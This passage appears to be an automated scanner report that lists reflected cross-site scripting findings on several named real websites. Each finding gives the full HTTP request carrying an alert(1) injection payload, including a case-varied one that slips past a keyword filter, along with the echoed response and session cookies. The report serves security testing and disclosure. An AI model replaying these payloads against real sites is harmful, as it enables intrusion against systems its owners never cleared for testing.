Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:07:04 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17195


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=randomhoused3ec7"><script>alert(1)</script>c88b024cdae">
...[SNIP]...

5.135. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182e6"%3b566f826a9ff was submitted in the from parameter. This input was echoed as 182e6";566f826a9ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sign-in.do?from=182e6"%3b566f826a9ff HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:02 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16907


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="182e6";566f826a9ff";
//-->
...[SNIP]...

5.136. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f8e</script>0cfb073a38a was submitted in the from parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sign-in.do?from=b6f8e</script>0cfb073a38a HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:21:44 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16963


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
   // extract 'from' param
   var url = window.location.href;
   var paramStart = url.indexOf("?");
   var fromParam = '';
   if( 'b6f8e</script>0cfb073a38a' == '') {
       if( paramStart != -1) {
           var paramString = url.substr(paramStart + 1);
           var tokenStart = paramString.indexOf('from');
           if( tokenStart != -1) {
               var token = paramString.substr(toke
...[SNIP]...

5.137. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8336"%3balert(1)//1decb9d5a21 was submitted in the from parameter. This input was echoed as a8336";alert(1)//1decb9d5a21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sign-in.do?from=randomhousea8336"%3balert(1)//1decb9d5a21 HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:07:07 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17075


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<!--
var s_account="ranhcorporate,ranhrollup";
var rh_division="Random House Corporate";
var rh_imprint="";
var rh_store="randomhousea8336";alert(1)//1decb9d5a21";
//-->
...[SNIP]...

5.138. http://g.adspeed.net/ad.php [ht parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Issue detail

The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a312"><script>alert(1)</script>2753c92f034 was submitted in the ht parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad.php?do=html&zid=14678&wd=728&ht=903a312"><script>alert(1)</script>2753c92f034&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 21:51:52 GMT
Server: AdSpeed/s10
Content-Length: 397

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://g.adspeed.net/ad.php?do=error&type=-1&wd=728&ht=903a312"><script>alert(1)</script>2753c92f034" alt="i" />
...[SNIP]...

5.139. http://g.adspeed.net/ad.php [wd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Issue detail

The value of the wd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c was submitted in the wd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /ad.php?do=html&zid=14678&wd=7287da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 21:51:50 GMT
Server: AdSpeed/s10
Content-Length: 397

<html><head><title>Ad Serving Error Message</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><a href="http://www.adspeed.com/Knowledges/qu
...[SNIP]...
<img style="border:0px;" src="http://g.adspeed.net/ad.php?do=error&type=-1&wd=7287da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c&ht=90" alt="i" />
...[SNIP]...

5.140. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09e"><script>alert(1)</script>f7c22091cea was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D8b09e"><script>alert(1)</script>f7c22091cea&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:43 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5215
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mpt2=[1394099180ER]8b09e"><script>alert(1)</script>f7c22091cea" target="_blank">
...[SNIP]...

5.141. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4679e"-alert(1)-"a62aee2375a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D4679e"-alert(1)-"a62aee2375a&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:43 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5140
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="http://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mpt2=[1394099180ER]4679e"-ale
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D4679e"-alert(1)-"a62aee2375a");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5
...[SNIP]...

5.142. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 403aa"%3balert(1)//7cc5d18bab was submitted in the mpvc parameter. This input was echoed as 403aa";alert(1)//7cc5d18bab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=403aa"%3balert(1)//7cc5d18bab HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:46 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5137
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="403aa";alert(1)//7cc5d18babhttp://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mp
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("403aa";alert(1)//7cc5d18bab");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("403aa";alert(1)//7cc5d18bab");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("403aa"%3balert(1)//7cc5d1
...[SNIP]...

5.143. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddc4"><script>alert(1)</script>a6ede4c7b5 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=5ddc4"><script>alert(1)</script>a6ede4c7b5 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:46 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5210
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="5ddc4"><script>alert(1)</script>a6ede4c7b5http://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mpt2=[1394099180ER]" target="_blank">
...[SNIP]...

5.144. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15902/126860/hitachi_anywhere336x280.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c479"-alert(1)-"d9e31151018 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:50:41 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 23:19:56 GMT
ETag: "168a1b-e53-4a07076c13f00"
Accept-Ranges: bytes
Content-Length: 4466
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
   mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018");
   mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
   mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018");
   mpck =
...[SNIP]...

5.145. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15902/126860/hitachi_anywhere336x280.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bec5d"%3balert(1)//31de559e8c0 was submitted in the mpvc parameter. This input was echoed as bec5d";alert(1)//31de559e8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D4926950&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3fbec5d"%3balert(1)//31de559e8c0 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:51:05 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 23:19:56 GMT
ETag: "168a1b-e53-4a07076c13f00"
Accept-Ranges: bytes
Content-Length: 4466
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
   mpvclick = encodeURIComponent("http://ad.uk.doubleclick.net/click;h=v8/3af5/3/0/*/u;240165093;0-0;0;50681866;4252-336/280;41773561/41791348/1;;~sscs=?bec5d";alert(1)//31de559e8c0");
   mpvc = mpvclick;
}
else if (mpvce == 2) {
   mpvclick2 = encodeURIComponent("http://ad.uk.doubleclick.net/click;h=v8/3af5/3/0/*/u;240165093;0-0;0;50681866;4252-336/280;41773561/41791348/1;;~sscs=?be
...[SNIP]...

5.146. http://kbportal.thomson.com/display/2/_midframe.aspx [tab parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/_midframe.aspx

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f5a"><script>alert(1)</script>563f308447c was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/_midframe.aspx?tab=e5f5a"><script>alert(1)</script>563f308447c&aid=&searchstring=&searchtype=&searchby=&alp=&search= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/index.aspx?tab=browse&c=&cpc=&cid=&cat=&catURL=&r=0.8218797
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; 